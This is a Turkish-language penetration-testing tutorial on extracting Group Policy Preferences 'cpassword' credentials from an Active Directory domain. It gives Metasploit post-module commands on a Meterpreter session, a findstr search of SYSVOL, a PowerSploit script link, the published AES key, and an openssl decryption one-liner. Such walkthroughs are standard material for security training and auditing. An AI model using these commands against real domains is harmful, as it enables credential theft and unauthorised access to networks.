1) MSF gpp Post Modülü Kullanımı
Etki alanı denetleyicisinde bir grup ilkesi ile cevat.yakupgil adlı hesabın parolasının yapılandırıldığı görülmektedir.
Varsayılan durumda, etki alanındaki herhangi bir istemci bilgisayarda, etki alanı hesabı ile bu parolanın şifrelenmiş/karıştırılmış haline Groups.xml dosyasından erişim sağlanabilir. Parolanın bu halinin Groups.xml dosyasındaki “cpassword” değişkenine atanmış olduğu görülmektedir. Etki alanındaki bir istemci bu değişkendeki şifreli parola değerini, istemci üzerinde kayıtlı olan simetrik bir SHA256 anahtarı ile deşifre eder.
Not: Parolanın tespit edilebileceği diğer dosyalar aşağıdaki gibi sıralanabilir.
- Groups.xml
- Services.xml
- Scheduledtasks.xml
- DataSources.xml
- Printers.xml
- Drives.xml
W7 adlı etki alanındaki bir bilgisayarda SYSTEM hakları ile Meterpreter bağlantısının elde edildiği görülmektedir. MSF gpp post modülü ile grup ilkesindeki “cpassword” değerine atanan parolanın açık halinin elde edilmesi için modül seçilir ve seçenekleri incelenir.
sessions
search gpp type:post
use post/windows/gather/credentials/gpp
show options
Modüle oturum ID değeri verilerek modül çalışıtırılır ve grup ilkesinde kayıtlı olan kimlik bilgileri ele geçirilir.
set SESSION 1
show options
run
Böylece, cevat.yakupgil hesabının parolasının açık metin hali elde edilmiş ve ilgili Groups.xml dosyasının içeriği kaydedilmiştir.
run
AES256 ile şifrelenen bu verinin çözülebilmesinin sebebi simetrik anahtarının Microsoft tarafından (yanlışlıkla) ifşa edilmiş (kendi sitesinde yayınlanmış) olmasıdır. Statik olan bu simetrik anahtar aşağıdaki gibidir:
4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8
f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b
Groups.xml dosyası /root/.msf/loot dizinine kaydedilmiş olduğu görülmektedir.
2) GPPPassword Betiği Kullanımı
Meterpreter elde edilmeden de “cpassword” değeri tespit edilebilir.
findstr /S /I cpassword \\EtkiAlaniFQDNAdi\SYSVOL\EtkiAlaniFQDNAdi\Policies\*.xml
“cpassword” değeri elde edildikten sonra, GPPPassword adlı bir powershell betiği ile de açık metin parola deşifre edilebilirdi.
https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1
3) Openssl Aracı Kullanımı
Standart Linux komutları ile de parola açık metin olarak deşifre edilebilir.
echo ‘Base64FOrmatindeParola’ | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
Kaynak: